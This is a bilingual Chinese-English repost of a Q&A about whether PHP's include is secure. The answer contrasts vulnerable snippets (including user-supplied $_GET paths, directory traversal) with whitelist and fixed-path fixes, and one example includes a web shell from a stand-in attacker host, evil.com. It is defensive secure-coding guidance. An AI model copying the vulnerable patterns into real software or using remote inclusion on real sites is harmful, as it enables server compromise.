PHP - 是“包括”功能安全？ [英] PHP - Is "include" function secure?

问题描述

我正在使用include函数（e.x.include'head2.php'或include'class.users.php'）
在我的网站中添加标题或会话类。我真的不记得在哪里，但我听说黑客滥用，不知何故，这个包含的东西，发送虚假的包含页面或类似的东西。
所以基本上我想知道什么是包含功能，我该如何保护它，它们如何滥用它以及是否有更好的解决方案来满足我的需求。

I'm using the "include" function (e.x. "include 'header2.php'" or "include 'class.users.php'") to add the header or session class in my website. I don't really remember where, but I heard that hackers abuse, somehow, this "include" thing, sending the fake included page or something like that. So basically I would like to know what's with that "include" function, how can I protect it, how do they abuse it and if there are better solutions for what I am looking for.

提前致谢。

推荐答案

这一切都取决于你如何实现它。如果您专门设置路径，那么它是安全的。如果您允许用户输入以确定文件路径而不进行清理或检查，则可能发生攻击。

It all depends on how you implement it. If you specifically set the path, then it's secure. The attack could happen if you allow user input to determine the file path without sanitization or checks.

不安全（目录遍历）

<?php 
include($_GET['file']);
?>

不安全（ URL fopen - 如果启用）

Insecure (URL fopen - If enabled)

<?php 
include('http://evil.com/c99shell.php');
?>

不安全

<?php 
include('./some_dir/' . $_GET['file']);
?>

部分不安全（* .php文件易受攻击）

<?php 
include('./some_dir/' . $_GET['file'] . '.php');
?>

安全（虽然不确定为什么有人会这样做。）

Secure (Though not sure why anyone would do this.)

<?php 
$allowed = array(
    'somefile.php',
    'someotherfile.php'
);

if (in_array(basename($_GET['file']), $allowed)) {
    include('./includes/' . basename($_GET['file']));
}
?>

安全

<?php 
include('./includes/somefile.php');
?>

这篇关于PHP - 是“包括”功能安全？的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！